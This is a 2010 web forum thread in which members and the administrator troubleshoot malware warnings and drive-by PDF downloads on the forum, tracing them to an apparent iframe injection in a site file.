1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
Dismiss Notice
Have you checked if your business appears in our directory? Add your basic information for FREE!

Click Here to know more!!

If you would like links to source leads, upgrade from £12.50 a month!

Click Here to subscribe!
Dismiss Notice

Hi Guest!

Our website stays online because of the support of our advertisers. A huge part of them are from banner ads that appear on our site. While some of them seems to be intrusive for some, these ads are needed to keep our community running and continue providing free membership service for buyers.

In light to this, we request that you disable ad blocking programs or add our website to your ad blocker's whitelist. This keeps us from offering our basic membership to everyone for free and help with maintenance costs of our website.

If you have already disabled ad blocking programs or added us into the whitelist, please ignore this message, this message will disappear in a few seconds!

Malware detected

Discussion in 'Forum Support & Feedback' started by RWA, Jun 26, 2010.

1. Anthony

Anthony

Thanks for the report, guys.

We're looking into this as a matter of urgency.

I haven't been able to re-create the warning messages that you are currently seeing, but the screenshots are proving helpful as we try to investigate further.

Update: Inspection of Google Webmaster Tools confirms no malmare detected. Possibly an external site or reference to a URL which is being flagged and not anything to do with our site. Either way, we must locate this reference if indeed that is the case and remove it.
  2. game-tec

game-tec

When I tried viewing this thread my browser just automatic downloaded a PDF again. I've just checked where it is comming from and it is:

Replace DOT with a .
  3. Anthony

Anthony

I don't doubt that this is happening to you, although I must say that I have been unable to recreate any of the events depicted in this thread. I have no malware warnings and certainly no files being downloaded upon viewing the site. Our server technical support confirmed the same at their end, too.

In the interests of self-preservation I think that it would be advisable to run a malmare scan, clear your cache, cookies and temporary Internet files and run a virus scan on your current PC. This should clear out anything that may be currently on your PC. After that, it would be good if you could return to the forum and see if it happens again. Please keep a note of exactly what happens as this can be used in our investigation. We must find the source and find it quick if indeed there is an exploit within the forum or via a reference URL.

I would be interested to hear from anyone else who is experiencing these specific symptoms, i.e. files being downloaded.

Thanks.
  4. Saajan

Saajan

Where is the PDF store?
  5. game-tec

game-tec

I will do that now. Although it only seems to be happening with this site :\.
  6. game-tec

game-tec

Sorry, I don't quite understand?
  7. Pete

Pete

No problems for me at this point.
  8. uhafmail

uhafmail

You have said that a PDF hhas been downloaded but downloaded to where? Obviously we know it is on your computer but where on the system.
  9. game-tec

game-tec

It just downloaded like a usual file would. It appeared at the bottom in the blue download bar which chrome has. It just saved to my normal downloads folder. myusername/Downloads/

If you wish I can upload the files to somewhere for you? I tried opening them in VMWare (sandbox) incase they were infected. But it seems they can't even be opened and are corrupt.
  10. DeveloperMatt

DeveloperMatt

I'm not getting any warning in Chrome on my laptop but in Firefox I did notice the status bar saying 'Waiting for btomiumgop....', when I first went onto the site http://www.thewholesaleforums.co.uk/forum/ no reference in the page source to this.
  11. game-tec

game-tec

12. DeveloperMatt

DeveloperMatt

Struggling to recreate the bt.....gop thing but I can recreate the source of the Chrome warning. I have to clear my cache to do this as it only appears on the first load and not subsequent pages, if the cache is cleared it does seen to appear on any page.

Here is the HTTP requests when loading http://www.thewholesaleforums.co.uk/forum

Looks like Firefox just blocks it without giving a warning
  13. game-tec

game-tec

Right, I just scanned my comp with 3 AV's. All comes out clean.

I also just decided to try it in firefox and although no warning I did see this at the bottom( the btom thing).

Link

It also told me I needed to install a plugin when viewing the site, Its just a general acrobat plugin for FF however I have never used FF on this computer, so most of you probably allready have it installed.

Link

PS: Just asked a friend to check, it appeared for them too ( the thing in the first image). It seems to only happen the first time you come here. If I refresh now it doesnt appear?
  14. DeveloperMatt

DeveloperMatt

I would check REMOVED and compare it to a backup. It appears to contain javascript and is always the forum file above the openpwn request.
  15. DeveloperMatt

DeveloperMatt

Try it with the Firefox HttpFox plugin which monitors all the HTTP requests when loading the page. When it's open you need to click start then click the forum link to refresh the page, then stop it before clicking any other link
  16. PhoenixFalls

PhoenixFalls Banned Member

A PDF has just been automatically downloaded to my computer... goes to default download folder.

A screenshot of browser window as it happened is attached. There is no PDF icon, because I currently have no software to open it.
  17. game-tec

game-tec

That's the same kind of file names the ones that got downloaded to me have. Also, if you look at the permissions of the PDF, it has permission to Write,Execute,Read & basicly do whatever it wants. I would delete it ASAP.
  18. game-tec

game-tec

Just checked, it seems that file is infected.

Link

However, It only does this once. Once I refresh that page, the harmful code has gone. Which would explain why the PDF only gets downloaded once.
  19. DeveloperMatt

DeveloperMatt

My message was aimed at Anthony, as you don't see the content of a php file on the client side.

Looks like the file has had an iframe injection attack
  20. PhoenixFalls

PhoenixFalls Banned Member

That PHP file acts a Javascript one, what we see is the output of the PHP. It's requested on each page, though I don't know it's original intention. Now it directs the request to the same server where the PDFs are downloaded from.